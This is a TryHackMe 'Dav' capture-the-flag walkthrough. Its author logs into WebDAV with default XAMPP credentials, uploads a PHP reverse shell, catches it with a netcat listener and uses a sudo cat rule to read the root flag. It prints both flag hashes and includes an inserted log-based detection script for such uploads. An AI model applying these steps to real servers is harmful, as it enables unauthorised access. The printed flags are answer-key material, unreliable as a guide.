Hey everybody!
It’s Shahabor Hossain Rifat here. Today I’m going to show you how you can break into the Dav TryHackMe machine. So let’s get started.
First I simply scanned for all the ports using Nmap.

Port 80 is open, so let’s access the website. There is an Apache default page.

Let’s run gobuster against the website and see what we can find out.

I found a WebDAV accessible directory.

We need a username and password to access this directory. I did some Google searches and I found a blog article:
http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html
I found that we can use ‘cadaver’ to access WebDAV. Let’s try to log in with the default credentials.
user: wampp
pass: xampp

We can now upload a PHP shell. I got a PHP reverse shell from the pentestmonkey GitHub.
Link: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Don’t forget to modify your IP and PORT in the PHP shell.

Do not forget to open a Netcat listener.

dav:/webdav/> PUT shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 193425 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav 44 August 26 2019
shell.php 193425 October 12 12:10

❯ nc -nvlp 9999
Connection from 10.10.155.247:49024
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
23:17:49 up 18 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/merlin/user.txt
449b40fe93f78a938523b7e4dcd66d2a
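The upload and the request that triggered the shell both leave entries in the web server's access log. The following is an added example, not part of the original write-up: a small detection check that flags script files written into the WebDAV collection with PUT and later requested. It assumes Apache's "combined" log format; the function name, the extension list and every sample log line are constructed for illustration.

```python
import re

# Apache "combined" access-log line; only the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
DAV_PREFIX = "/webdav/"                            # collection named in the write-up
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed server-executed types

# Constructed sample lines (addresses, dates and sizes are made up).
SAMPLE_LOG = [
    '10.9.0.5 - - [12/Oct/2020:12:09:58 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "-"',
    '10.9.0.5 - wampp [12/Oct/2020:12:10:01 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1012 "-" "-"',
    '10.9.0.5 - wampp [12/Oct/2020:12:10:07 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 260 "-" "-"',
    '10.9.0.7 - wampp [12/Oct/2020:12:10:20 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 260 "-" "-"',
    '10.9.0.5 - wampp [12/Oct/2020:12:10:30 +0000] "GET /webdav/shell.php HTTP/1.1" 200 0 "-" "-"',
]

def find_dav_script_uploads(lines):
    """Return one finding per script file written to the DAV collection via PUT,
    listing the clients that later requested (and so executed) it."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        path = m["path"].split("?", 1)[0]
        status = int(m["status"])
        if not path.startswith(DAV_PREFIX):
            continue
        if (m["method"] == "PUT" and status in (201, 204)
                and path.lower().endswith(SCRIPT_EXT)):
            findings[path] = {"path": path, "uploaded_at": m["ts"],
                              "uploader": m["ip"], "auth_user": m["user"],
                              "executed_by": []}
        elif m["method"] in ("GET", "POST") and status == 200 and path in findings:
            findings[path]["executed_by"].append(m["ip"])
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_dav_script_uploads(SAMPLE_LOG):
        print(finding)
```

A finding whose `auth_user` is a default account is a strong signal. The durable fix is to change the default WebDAV credentials and stop the server from executing scripts inside the writable collection.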
After a bit of enumeration, I ran the sudo -l command. We see that we can leverage cat to read the root flag because we can run it as root.
$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/cat
It’s too easy
$ sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
Yahoooooooo!
Hope you guys enjoyed this tryhackme Walkthrough.
Nice Post